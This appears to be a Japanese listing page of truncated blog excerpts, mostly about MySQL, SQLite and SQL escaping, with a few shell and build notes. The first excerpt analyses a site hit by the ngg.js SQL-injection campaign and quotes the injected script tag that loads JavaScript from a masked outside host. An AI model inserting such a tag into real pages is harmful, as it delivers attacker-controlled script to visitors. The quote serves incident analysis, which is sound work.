うわさのngg.jsを調べていたらこんな表示のサイトを見かけました。 HTMLソースは以下の通り 宮城県、福島県、山形県、岩手県、秋田県<script src=http://www.XXXXXX.com/ngg.js></script> おそらく、SQLインジェクションによりSCRIPT要素を埋め込まれたものの、XSS対策がとられていたので、JavaScriptの実行はされない状態で表示されているのだと思います。 第5回 クロスサイト...
とある勉強会でSunのエンジニアの人のプレゼンを直接聞く機会があったのでメモったことを公開します。基本的な事が多いんだろうけど、非常に参考になりました。 パフォーマンスとは スループット レスポンスタイム/レイテンシ スケーラビリティ 上記のコンビネーション アーキテクチャとは Connection Thread Pool Query Cache Parser SQLクエリをパース Optimizer Storage Engines アプリによっ...
SQLのエスケープと聞いてやってきましたよ。2008-07-10 - T.Teradaの日記から 例えば、「\%foo」から始まる文字列を検索する場合には、どのようなSQL文を書けばよいのでしょうか。 条件は以下の通りです。 1. DBMSソフトはMySQL 2. ESCAPE節は使わない 【中略】 「\%foo」から始まる文字列を検索するSQL文は、以下のようになります。 mysql> SELECT 123 FROM dual WHERE '\\%foo456' LIKE '\\\\\\%foo%'; MySQLの...
SQLiteでも画像を格納したり取り出して表示とかしてみたい。 ってことでやってみました。 動作ムービーはこちら 結局のところ画像データをテキストでデータベースへ保存するしかないっぽくてBase64ってメールでも使われているものを使用します。 ロードデータをBase64へエンコード var enc:Base64Encoder = new Base64Encoder(); enc.encodeBytes(ByteArray(URLLoader(e.target).data)); Base64なテキストデータ...
MySQLだと問題ないみたい。あと、job の引数に何を渡すかで変わってくるらしい…… ちなみに SQLite 用のスキーマは TheSchwartz 自身に同梱されていて t/schema-sqlite.sql に、PostgreSQL 用のはリポジトリの trunk にあります。doc/schema-postgres.sql 検証用のスクリプトは最後に載せますが、単に client が job を突っ込んで、worker が job を取り出して $job->completed() するだけのものです。 Gtop を使っ...
magic_multi_connections Magic Multi-Connections magic_multi_connectionsのページ Magic Multi-Connections: A “facility in Rails to talk to more than one database at a time” magic_multi_connections作った人の記事 Twitterのトラブルから見る、DB分割でスケーラブルなRailsサイト構築 magic_multi_connectionsの使い方がのってる Ruby on RailsでMagic Multi-Connectionsを使う magic_multi_connectionsの使い方がのってる 分散DB対応ライブラリ Magic Multi-Conn...
楽々ERDレッスン 作者: (株)スターロジック羽生章洋 出版社/メーカー: 翔泳社 メディア: 単行本 ふと思うことあったので、自分の考えをメモっておく。 弊社では現在稼動している全てのシステムがサロゲートキーです。なぜそうしているかということについて。 サロゲートキーについて、「変更に強い」という点がよくとりあげられてます。クライアントコードは変更されるから...
「コネクションプーリング都市伝説」という単語がある.かいつまんでいうと 「コネクションプールって一般的に速いと言われているけど,クライアントが 多くなると接続維持のコストが大きくなるから今となっては速くないんじゃね?」 というものだ. WEB+DB PRESS vol.33でnipotanさんの中の人が書いてた記事が発端だと思われる. あとこんなエントリもあった. [http://hori-uchi.com/archives/00044...
はてぶで人気エントリーになっていた、 http://kokoromo.jugem.cc/?eid=195 [MySQL:1台しかない環境で負荷分散] これは負荷分散=スケールアウトというよりは一台でスケールアップしてしのぐ手段を書いてい。 だから負荷分散という言葉は必ずしも正しくないのだが、一つのテーブルへの付加集中を分散させるという事なのだろう。 そこで何パターンかあるMySQLの負荷分散を簡単にまとめ...
サイボウズがそれまでのプロプライエタリな姿勢から、MySQLの採用に踏み切った背景には何があるのか。サイボウズの代表取締役社長、青野慶久氏がその真意を語った。 ITmedia エンタープライズ:青野氏激白! サイボウズがMySQLを採用した理由 サイボウズが製品パッケージに使用しているDBを独自DBからMySQLに変更した、その理由を社長自らが語るという記事。市場におけるMySQLの...
NDOメソッドっぽく質問されてたので答えてみる。 あと聞きたいのは(←ずうずうしい…)、アプリケーションサーバとかリバースプロキシサーバとかのapacheなどのMaxClientsをどのくらいにしているのかですね。カリカリにチューニングしているのか、ハイパフォーマンスMySQLでJeremyさんがYahoo! comのことを書いてた様に1台当り MaxClients 30 ぐらいしか立ち上げてないのか。 Clouder::Blogger: ...
これは以下の日記の続きです。 →チェーンメールとかチェーンブログテキストを推奨されてもな、というのがぼくの感想だった 訴状は以下のところから見ることはできるんですが、 →音楽配信メモ オリコンが自分たちに都合の悪い記事を書いたジャーナリストを潰すべく高額訴訟を起こす こんな状態みたいなので、 ※現在アクセスがこのエントリに集中しており、アクセス...
すこし前にはてなスターのリリースがされたのですが、サービス開始直後にありがちなことに、時々負荷で遅くなったり、アクセスしにくくなったりしてしまいました*1。これではいけない、ということで、すぐ次の日に、バックエンドのサーバを一気に10台近くまで増やして、おおむね快適に使える状態になっていると思います。この時に、新しいサーバをまっさらな状態から、...
MDC - Storage これを読んで、僕が思ったポイント。 Firefox 2.0には、SQLiteが組み込まれている。 同じくFirefox 2.0で導入された、クライアントサイドストレージ(sessionStorage/globalStorage)とは異なるもの。(クライアントサイドストレージの中では、このSQLiteが利用されている。) 基本的にchrome URLや拡張からの利用を想定し、ウェブページからは利用できない。 システムや拡張のデータファイ...
今日のPodCastはこちら http://yapc.g.hatena.ne.jp/jkondo/20060330 配付資料のリンクはここかな? http://tokyo.yapcasia.org/wiki/?SlidesList 昨日に引き続き私の偏ったメモより役に立つログ http://d.hatena.ne.jp/mskgc/20060330/1143718709 Perl 5.8 and Unicode perldoc perluniintro Encodeモジュール Perl5.8 -- utf8フラグが立ったものしか、utf8として扱えない(例えそれがutf8として有効なバイト列であっても) decode = perlに入れる...
DreamHost という海外のレンタルサーバを最近になって知りました。 いちばん安い Crazy Domain Insane! プランを見てみると、2007年1月19日現在、 料金1年契約=月9.95ドル、2年契約=月7.95ドル ディスクスペース190GB 月間転送量制限1.9TB (←テラ!) 桁間違ってませんか? と言いたくなるような設定。しかも、1週間ごとにちょっとずつ増量されるっぽいことも書いてある。他には PHP4,5 両対応...
ずいぶんと間が空いてしまったが, [http://d.hatena.ne.jp/yamaz/20060903:title=「コネクションプーリング都市伝説」はほんとに都市伝説?(その1)]の続きについて書きたい. まず本題に移る前にシリアル処理とパラレル処理の違いについて説明したい. シリアル処理ととパラレル処理 シリアル/パラレル処理というのは複数のタスクがあった場合の処理の方法で シリアル処理 → タスクを一つず...
MySQLのモニタするのに便利なmytopなんですが、MySQL 5に対して使うと、クエリの割合表示が全部ゼロになってしまったります。 これは、MySQL 5.0.2でSHOW STATUS文が変更され、GLOBALかSESSIONというオプションを指定できるようになったことに起因します。このオプションを省略した際はSESSIONを指定したときと同じ動作となり、SHOW STATUS文で得られるのは自分自身の接続についての情報のみ...
男のbashユーザーが、バラ色の紳士こと漢のzshに乗り換えたときに アッーってなるコト事を先ほどいくつか思いついたので共有する。 !!とかの履歴実行はrコマンドで zshには、r というシェル組み込みコマンドがあって 履歴からの実行が簡単に行える。 たとえば、一番最後に実行したviコマンドを実行したいときなどだ。 bashなんかだと !vi で出来るのだが、 rコマンドだったら % r v...
curl -O ftp://ftp.gnu.org/gnu/readline/readline-5.1.tar.gz tar xzvf readline-5.1.tar.gz cd readline-5.1 ./configure --prefix=/usr/local make sudo make install cd .. もし以下のようなエラーが出る場合はXcodeがインストールされていません。 checking whether make sets $(MAKE)... no checking for gcc... no checking for cc... no checking for cc... no checking for cl... no configure: error: no acceptable C compiler found in $PATH 次にRubyをダウンロード、インストールし...
